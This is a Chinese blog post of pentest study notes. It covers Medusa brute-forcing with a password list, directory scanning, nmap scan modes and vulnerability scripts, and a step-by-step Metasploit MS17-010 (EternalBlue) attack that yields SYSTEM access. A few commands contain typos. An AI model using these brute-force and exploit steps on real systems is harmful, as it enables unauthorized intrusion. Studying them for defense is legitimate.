zoukankan      html  css  js  c++  java
  • 9.26 扫描工具

    美杜莎medusa 开源的,支持的服务有很多种,ftpsshmssqlmysqlsnmp等等

    kali系统中内置有。

    Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

    例如Medusa -h 123.123.12.1 -P /root/top1000.txt -M ftp -e ns -t 20 -f -r 0 -O ./result_ftp.txt

    -h 爆破的主机ip

    -H ip集合

    -u 用户名

    -U 用户字典

    -p 单个密码

    -P 密码字典

    -C 组合条目文件username:password

    -M 模块

    -O 输出list

    -e ns  e表示制定策略爆破,n表示空密码 s表示密码用户名相同

    -n 端口

    -t 线程数

    -f 找到正确账户密码终止

    -r 重试间隔时间

    -d 显示所有模块的名称

    目录扫描:扫描站点的目录,寻找敏感文件(目录名、探针文件、后台、robots.txt、备份文件等)

    目录:站点结构,权限控制不严格

    探针文件:服务器配置信息,phpinfo.php redme.txt config.txt

    后台:管理整个网站的入口,inurl:admin.php

    robots.txt:一般存放在站点根目录,如果管理员对robots.txt文件不合理管理就会造成信息泄露

    备份文件:数据库备份、网站备份文件(xxxx.bakxxxx.zipxxxx.rar之类的格式)

    御剑后台扫描工具

    DirBuster

    Nmap最早是linux中的扫描和嗅探工具,网络连接扫描工具,主要探测主机存活(是否开机)、开启服务(扫端口)、安全性问题(高级用法)、系统类型(OS类型)

    Nmap的安装、配置环境变量

    用法:(明令行模式)

    nmap -h 帮助信息

    nmap 123.123.12.1 扫描单个ip

    状态:

    Open 开启

    Close 关闭

    filtered 被过滤、探测包被拦截,无法定位端口是否开启

    Unfiltered 未来=过滤,探测包没有被拦截,只是nmap无法判断该端口是否开启

    open|filtered 开启或者被过滤的

    close|filtered 关闭或者被过滤的

    nmap 123.123.12.1/24扫描整个网段

    nmap 123.123.12.1-200扫描指定的网络

    nmap 123.123.12.1,100,200-230扫描.1 .100.200-230之间的网络

    nmap 123.123.12.0/24 10.10.10.0/24 扫描不同网段

    nmap -iL filename 扫描目标文件

    nmap -iR 随机选择目标去探测 eg:nmap -sS -PS80 iR 0(无休止的去扫描)-p80

    nmap 123.123.12.0/24  --exclude 123.123.12.10,255,20-30  排除某些IP去扫描

    带有参数的扫描

    nmap -sT 192.168.1.1 使用TCP全连接的方式,扫描过程需要三次握手去建立连接,建立成功,则端口开放。扫描速度慢

    nmap -sS 192.168.1.1 使用SYN的数据包去检测,需要接受ACK,则说明端口开放了

    nmap -sN 192.168.1.1 NULL扫描,发出的数据包不设置任何标识位

    注意:上述扫描的端口默认都是1-1000

    -p后跟指定的端口 -p20,21,22,3306  -p- = -p1-65536

    nmap -sV 192.68.1.1探测服务版本

    nmap 192.168.1.1 >./re.txt

    nmap 192.168.1.1 -oX re.html

    nmap -A 192.168.1.1获取目标所有详细结果,全面扫描

    nmap -O 192.168.1.1探测操作系统的类型

    --script 使用脚本去探测漏洞

    nmap --script smb-vuln-ms17-010 192.168.1.1  永恒之蓝

    nmap --script smb-check-vulns 192.168.1.1  MS08-067

    nmap --script ssl-heartbleed 192.168.1.1  心脏滴血

    使用MSF通过MS17-010获取系统权限

    Step1:开启postgressql数据库 /etc/init.d/postgressql start

    Step2: msfconsole进入MSF

    search 17-010 搜索cve17-010相关的exp

    auxiliary/scanner/smb/smb_ms17_010扫描漏洞是否存在

    exploit/windows/smb/ms17_010_enternalblue用来攻击的exp

    Step3

    探测漏洞是否存在

    use auxiliary/scanner/smb/smb_ms17-010

    Set rhosts 10.10.10.0/24

    Exploit

    Step4:实施攻击

    use exploit/windows/smb/ms17_010_eternalblue

    Set shorts 10.10.10.12

    Exploit

    Step5:攻击成功之后就能到目标的system权限

  • 相关阅读:
    洛谷 P1037 产生数
    【bzoj】 1070: [SCOI2007]修车
    【bzoj】 1066: [SCOI2007]蜥蜴 (网络流)
    开发环境搭建
    数据库设计
    sql优化实例(用左连接)
    泛型T和通配符?的区别
    Nginx配置优化
    Tomcat优化
    Nginx反向代理配置
  • 原文地址:https://www.cnblogs.com/x98339/p/11593249.html
Copyright © 2011-2022 走看看